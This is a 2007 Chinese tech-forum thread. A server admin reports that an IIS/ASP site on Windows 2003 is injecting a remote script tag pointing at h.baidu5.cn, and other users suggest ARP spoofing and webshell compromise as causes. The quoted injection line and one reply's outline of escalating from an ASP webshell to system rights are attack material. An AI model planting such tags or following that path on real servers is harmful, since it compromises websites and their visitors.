刚做好的2003服务器中毒了,要被老板打了,,急~~~~~~~~~~~~~~~~~~

bdsw51200 2007-05-19 09:03:55
事件类型: 审核成功
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2007-5-19
事件: 4:13:02
用户: NT AUTHORITY\SYSTEM
计算机: RQFDF-AQ6SSO9SP
描述:
已经创建新的过程:
新的进程 ID: 3196
映像文件名: C:\WINDOWS\system32\csrss.exe
创建者进程 ID: 288
用户名: RQFDF-AQ6SSO9SP$
域: WORKGROUP
登录 ID: (0x0,0x3E7)


事件类型: 审核成功
事件来源: Security
事件种类: 详细追踪
事件 ID: 592
日期: 2007-5-19
事件: 4:13:02
用户: NT AUTHORITY\SYSTEM
计算机: RQFDF-AQ6SSO9SP
描述:
已经创建新的过程:
新的进程 ID: 3016
映像文件名: C:\WINDOWS\system32\winlogon.exe
创建者进程 ID: 288
用户名: RQFDF-AQ6SSO9SP$
域: WORKGROUP
登录 ID: (0x0,0x3E7)
RADFD-AQ6SS09SP IIS来宾帐户




IIS的服务骑,ASP系统,在访问asp网页的时候会被自动加载源代码<script src=http://h.baidu5.cn/s.js></script> ,查了代码却没有这个,很郁闷。。昨天就这样。。。昨晚新做了一个系统,, 安全就发现上面两个有点问题。。
端口开了21,80,3389
怀疑是ARP攻击 有没有好的ARP软件?
...全文
361 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
yolanda520 2007-05-22
  • 打赏
  • 举报
回复
用arp -all命令看看,叫机房去查网关网卡的物理地址 就能确认
bdsw51200 2007-05-22
  • 打赏
  • 举报
回复
查出问题 ,,,,机房网关中毒 都和他们说了是ARP 他吗 还说不是
zzxiaoma 2007-05-21
  • 打赏
  • 举报
回复
只能用杀毒软件了
smallcrocodile 2007-05-21
  • 打赏
  • 举报
回复
郁闷
空心兜兜 2007-05-19
  • 打赏
  • 举报
回复
帮顶!
代码跳动 2007-05-19
  • 打赏
  • 举报
回复
如果你的服务器没有开放ftp,或者说你的服务器所有网站上没有上传等获得webshell的漏洞.排除了外部有webshell的可能性. 那就从自己机器上找找原因了.
代码跳动 2007-05-19
  • 打赏
  • 举报
回复
2003 如果开放了iis,没做设置情况下, 任意有aspshell的都可以获得系统权限.

上传asp木马, 上传cmd.exe 可以执行任意命令,获取系统权限!建立帐号,开放3389自然也是其中之列.
bdsw51200 2007-05-19
  • 打赏
  • 举报
回复
先帮我处理一下IIS的病毒了 谢谢大家。。。急死我了
bdsw51200 2007-05-19
  • 打赏
  • 举报
回复
3389也能发生这样的情况??
andyzgx1 2007-05-19
  • 打赏
  • 举报
回复
为什么开3389??你的应该是3389攻击
myangelonline 2007-05-19
  • 打赏
  • 举报
回复
殺毒.............

9,506

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧